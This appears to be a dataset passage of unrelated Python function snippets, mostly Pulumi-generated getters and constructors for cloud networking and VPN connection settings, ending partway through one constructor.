"def __init__(__self__, *,\n datapath_provider: Optional[pulumi.Input['NetworkConfigDatapathProvider']] = None,\n default_snat_status: Optional[pulumi.Input['DefaultSnatStatusArgs']] = None,\n dns_config: Optional[pulumi.Input['DNSConfigArgs']] = None,\n enable_intra_node_visibility: Optional[pulumi.Input[bool]] = None,\n enable_l4ilb_subsetting: Optional[pulumi.Input[bool]] = None,\n gateway_api_config: Optional[pulumi.Input['GatewayAPIConfigArgs']] = None,\n private_ipv6_google_access: Optional[pulumi.Input['NetworkConfigPrivateIpv6GoogleAccess']] = None,\n service_external_ips_config: Optional[pulumi.Input['ServiceExternalIPsConfigArgs']] = None):\n if datapath_provider is not None:\n pulumi.set(__self__, \"datapath_provider\", datapath_provider)\n if default_snat_status is not None:\n pulumi.set(__self__, \"default_snat_status\", default_snat_status)\n if dns_config is not None:\n pulumi.set(__self__, \"dns_config\", dns_config)\n if enable_intra_node_visibility is not None:\n pulumi.set(__self__, \"enable_intra_node_visibility\", enable_intra_node_visibility)\n if enable_l4ilb_subsetting is not None:\n pulumi.set(__self__, \"enable_l4ilb_subsetting\", enable_l4ilb_subsetting)\n if gateway_api_config is not None:\n pulumi.set(__self__, \"gateway_api_config\", gateway_api_config)\n if private_ipv6_google_access is not None:\n pulumi.set(__self__, \"private_ipv6_google_access\", private_ipv6_google_access)\n if service_external_ips_config is not None:\n pulumi.set(__self__, \"service_external_ips_config\", service_external_ips_config)",
"def type(self, type):\n allowed_values = [\"android\", \"ios\"]\n if type.lower() not in map(str.lower, allowed_values):\n # print(\"Invalid value for type -> \" + type)\n self._type = \"outdated_sdk_version\"\n else:\n self._type = type",
"def network_dataplane(self) -> Optional[pulumi.Input[Union[str, 'NetworkDataplane']]]:\n return pulumi.get(self, \"network_dataplane\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def type(self) -> Optional[pulumi.Input['ClusterTelemetryType']]:\n return pulumi.get(self, \"type\")",
"def network_config(self) -> pulumi.Input['PrivateCloudNetworkConfigArgs']:\n return pulumi.get(self, \"network_config\")",
"def protocol(self):\n raise UnsupportedCall(f\"'{self.__class__.__name__}' object has no attribute 'protocol'\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def network_config(self) -> Optional[pulumi.Input['NodeNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def trafficProtocol(self):\n #\n # TODO: Reimplement this if possible.\n #\n return client.trafficProtocol(self)",
"def network_interface(self): \n return self._network_interface",
"def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:\n return pulumi.get(self, \"network_mode\")",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def protocol(self) -> Optional[pulumi.Input[Union[str, 'Protocol']]]:\n return pulumi.get(self, \"protocol\")",
"def _configure_neutron_api(self):\n logging.info('Configuring `manage-neutron-plugin-legacy-mode` for '\n 'neutron-api...')\n n_api_config = {\n 'manage-neutron-plugin-legacy-mode': False,\n }\n with self.config_change(\n n_api_config, n_api_config, 'neutron-api'):\n logging.info('done')",
"def get_network_dataplane(self) -> Union[str, None]:\n return self.raw_param.get(\"network_dataplane\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def add_field(self, field_name, label, description, type, function=None):\n new_field = {\n \"label\": label,\n \"description\": description,\n \"type\": type,\n }\n if function is not None:\n new_field[\"source\"] = \"function\"\n self.fields[field_name] = function\n else:\n new_field[\"source\"] = \"system\"\n self.fields[field_name] = \"No value\"\n self.description[\"fields\"][\"values\"][field_name] = new_field\n\n # update MongoDB\n #self.mongo_client.cps2_project.objects.update_one(\n #{\"_id\": self.mongo_id},\n #{\"$set\": {\"fields.values.\" + field_name: new_field,\n #\"last_modified.value\": str(datetime.utcnow())}\n #}\n #)\n print(\"Added a new field called \\\"\" + field_name + \"\\\" and updated MongoDB.\")",
"def provider(self) -> Optional[pulumi.Input['NetworkPolicyProvider']]:\n return pulumi.get(self, \"provider\")",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def node_topology(self) -> \"LabelSelector\":\n return typing.cast(\n \"LabelSelector\",\n self._properties.get(\"nodeTopology\"),\n )",
"def server_type(self):\n ...",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def get_plugin_type(self):\n return constants.L2GW",
"def set_network_connection_type(self,param={},ignore_error_handle = False):\n message = {};\n step = 'set network connection type \\'' + str(param.get('network_type',0)) + '\\'';\n network_type = param.get('network_type',0);\n try:\n if network_type == 0:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n elif network_type == 1:\n self.driver.set_network_connection(ConnectionType.AIRPLANE_MODE);\n elif network_type == 2:\n self.driver.set_network_connection(ConnectionType.WIFI_ONLY);\n elif network_type == 4:\n self.driver.set_network_connection(ConnectionType.DATA_ONLY);\n elif network_type == 6:\n self.driver.set_network_connection(ConnectionType.ALL_NETWORK_ON);\n else:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n message = self.feedback.feedback_action_ok(step);\n except BaseException,e:\n message = self.feedback.feedback_action_fail(step,str(e),ignore_error_handle);\n finally:\n return message;",
"def getProtocol(self) -> str:\n ...",
"def __init__(__self__, *,\n ip_tag_type: Optional[pulumi.Input[str]] = None,\n tag: Optional[pulumi.Input[str]] = None):\n if ip_tag_type is not None:\n pulumi.set(__self__, \"ip_tag_type\", ip_tag_type)\n if tag is not None:\n pulumi.set(__self__, \"tag\", tag)",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def __init__(__self__, *,\n type: Optional[pulumi.Input['ClusterTelemetryType']] = None):\n if type is not None:\n pulumi.set(__self__, \"type\", type)",
"def protocol(self):\n ...",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def __init__(__self__, *,\n customer_gateway_id: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = 
None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n pulumi.set(__self__, \"type\", type)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n 
pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, 
\"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: 
Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, 
\"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, 